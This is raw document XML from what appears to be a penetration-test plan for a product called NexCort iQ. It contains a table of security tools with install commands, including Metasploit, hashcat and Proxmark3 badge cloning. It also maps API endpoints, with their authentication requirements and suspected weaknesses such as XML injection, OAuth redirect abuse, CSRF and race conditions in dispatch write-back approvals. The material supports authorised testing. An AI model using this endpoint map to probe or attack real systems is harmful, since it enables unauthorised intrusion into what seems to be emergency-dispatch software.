            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">apt install nmap</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Service discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Burp Suite Pro</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Web Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">portswigger.net</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Intercept, replay, active scan</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Metasploit</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Exploitation</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">apt install metasploit-framework</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Known exploit modules</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">ffuf</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">go install github.com/ffuf/ffuf/v2@latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint/parameter fuzzing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">jwt_tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT Testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip3 install jwt_tool</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT attack vectors</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Password Cracking</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">apt install hashcat</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">JWT secret brute force</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">SAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip3 install semgrep</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Code vulnerability patterns</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Gitleaks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Secret Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">brew install gitleaks</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardcoded secrets</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">TruffleHog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Secret Detection</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip3 install trufflehog</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Git history scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OWASP ZAP</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">DAST</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">zaproxy.org</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Automated web app scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Nuclei</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CVE Scanning</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">go install nuclei@latest</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Template-based CVE checks</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GoPhish</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Social Engineering</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">getgophish.com</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Phishing simulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Proxmark3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Physical / RFID</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Hardware + firmware</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Badge cloning</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Volatility 3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Memory Forensics</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip3 install volatility3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="432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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Process memory analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Shodan CLI</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Passive Recon</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">pip3 install shodan</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="4320"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">External asset discovery</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p>
      <w:r>
        <w:t xml:space="preserve"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:pBdr>
          <w:bottom w:val="single" w:color="7C3AED" w:sz="4" w:space="6"/>
        </w:pBdr>
        <w:spacing w:after="160" w:before="360"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="7C3AED"/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Appendix B — NexCort iQ Attack Surface Reference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80"/>
        <w:gridCol w:w="1440"/>
        <w:gridCol w:w="720"/>
        <w:gridCol w:w="5040"/>
      </w:tblGrid>
      <w:tr>
        <w:trPr>
          <w:tblHeader/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Endpoint / Component</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Auth Required</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Public</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="2D2A40" w:val="clear"/>
            <w:tcMar>
              <w:top w:type="dxa" w:w="80"/>
              <w:left w:type="dxa" w:w="120"/>
              <w:bottom w:type="dxa" w:w="80"/>
              <w:right w:type="dxa" w:w="120"/>
            </w:tcMar>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p>
            <w:pPr>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
                <w:b/>
                <w:bCs/>
                <w:color w:val="E4DFF5"/>
                <w:sz w:val="18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Risk Notes</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/cad/cap/ingest/{agencyId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">X-RC-Cap-Token</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">XML injection, rate limit, FIPS routing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/report/{qrId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Scan count manipulation, deactivated code bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/integrations/ring/login</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OAuth redirect, state collision</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/integrations/ring/callback</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">OAuth code</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Code replay, token leakage</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/integrations/ring/user-status</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">None</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Yes</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Status spoofing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/cad/writeback/{incidentId}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT dispatcher</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">CSRF, own-submission bypass</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">POST /api/admin/cad-writeback-approvals/*/approve</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT supervisor</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Race condition, own-approval</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">GET /api/admin/pricing/global</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="144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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT rcsuperadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="72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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="504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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Revenue data exposure</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="2880"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">PUT /api/admin/pricing/tenants/{id}</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="1440"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">RC JWT rcadmin</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="720"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">No</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="5040"/>
            <w:shd w:fill="F8F7FE"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18"/>
                <w:szCs w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve">Unauthorized price manipulation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:type="dxa" w:w="288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18"/>
